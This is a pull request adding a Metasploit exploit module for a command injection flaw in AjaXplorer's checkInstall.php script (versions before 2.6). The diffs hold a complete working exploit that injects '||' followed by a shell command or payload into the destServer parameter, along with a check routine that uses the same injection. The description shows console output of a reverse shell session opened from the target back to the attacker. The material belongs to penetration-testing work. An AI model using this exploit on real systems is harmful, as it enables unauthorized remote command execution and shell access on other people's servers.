### PR TITLE
Add OSVDB-63552 AjaXplorer module (2010)

### DIFF
--- a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
+++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
@@ -20,7 +20,12 @@ class Metasploit3 < Msf::Exploit::Remote
 				AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to
 				2.6 are vulnerable.
 			},
-			'Author'         => [ 'David Maciejak' ],
+			'Author'         =>
+				[
+					'Julien Cayssol',  #Credited according to SecurityFocus
+					'David Maciejak',  #Metasploit module
+					'sinn3r'           #Final touch on the Metasploit module
+				],
 			'License'        => MSF_LICENSE,
 			'References'     =>
 				[

--- a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
+++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
@@ -1,0 +1,106 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'AjaXplorer checkInstall.php Remote Command Execution',
+			'Description'    => %q{
+					This module exploits an arbitrary command execution vulnerability in the
+				AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to
+				2.6 are vulnerable.
+			},
+			'Author'         => [ 'David Maciejak' ],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'OSVDB', '63552' ],
+					[ 'BID', '39334' ]
+				],
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'DisableNops' => true,
+					'Space'       => 512,
+					'Compat'      =>
+						{
+							'ConnectionType' => 'find',
+							'PayloadType' => 'cmd',
+							'RequiredCmd' => 'generic perl ruby python bash telnet'
+						}
+				},
+			'Platform'       => ['unix', 'bsd', 'linux', 'osx', 'windows'],
+			'Arch'           => ARCH_CMD,
+			'Targets'        => [[ 'AjaXplorer 2.5.5 or older', { }]],
+			'DisclosureDate' => 'Apr 4 2010',
+			'DefaultTarget' => 0))
+
+		register_options(
+			[
+				OptString.new('TARGETURI', [true, 'The base path to AjaXplorer', '/AjaXplorer-2.5.5/'])
+			], self.class)
+	end
+
+	def check
+		target_uri.path << '/' if target_uri.path[-1,1] != '/'
+		clue = Rex::Text::rand_text_alpha(rand(5) + 5)
+
+		res = send_request_cgi({
+			'method' => 'GET',
+			'uri'      => "#{target_uri.path}plugins/access.ssh/checkInstall.php",
+			'vars_get' => {
+				'destServer'    => "||echo #{clue}"
+			}
+		})
+
+		# If the server doesn't return the default redirection, probably something is wrong
+		if res and res.code == 200 and res.body =~ /#{clue}/
+			return Exploit::CheckCode::Vulnerable
+		end
+
+		return Exploit::CheckCode::Safe
+	end
+
+	def exploit
+		peer = "#{rhost}:#{rport}"
+		target_uri.path << '/' if target_uri.path[-1,1] != '/'
+
+		# Trigger the command execution bug
+		res = send_request_cgi({
+			'method' => 'GET',
+			'uri'      => "#{target_uri.path}plugins/access.ssh/checkInstall.php",
+			'vars_get' =>
+				{
+					'destServer'    => "||#{payload.encoded}"
+				}
+			})
+
+		if res
+			print_status("#{peer} - The server returned: #{res.code} #{res.message}")
+			m = res.body.scan(/Received output:\s\[([^\]]+)\]/).flatten[0] || ''
+
+			if m.empty?
+				print_error("#{peer} - This server may not be vulnerable")
+			else
+				print_status("#{peer} - Command output from the server:")
+				print_line(m[1])
+			end
+		end
+	end
+
+end
+
+=begin
+Repo:
+http://sourceforge.net/projects/ajaxplorer/files/ajaxplorer/2.6/
+=end

--- a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
+++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
@@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				print_error("#{peer} - This server may not be vulnerable")
 			else
 				print_status("#{peer} - Command output from the server:")
-				print_line(m[1])
+				print_line(m)
 			end
 		end
 	end


### PR DESCRIPTION
This pull request was created on behalf of David Maciejak, who emailed it to our dev mailbox. Old bug.

This module exploits an arbitrary command execution vulnerability in the AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to 2.6 are vulnerable.

```
msf  exploit(ajaxplorer_checkinstall_exec) > rexploit
[*] Reloading module...

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo mhL4n8ad02mgEkZ2;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "mhL4n8ad02mgEkZ2\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.0.1.3:4444 -> 10.0.1.5:42557) at 2012-10-13 00:35:17 -0500
```
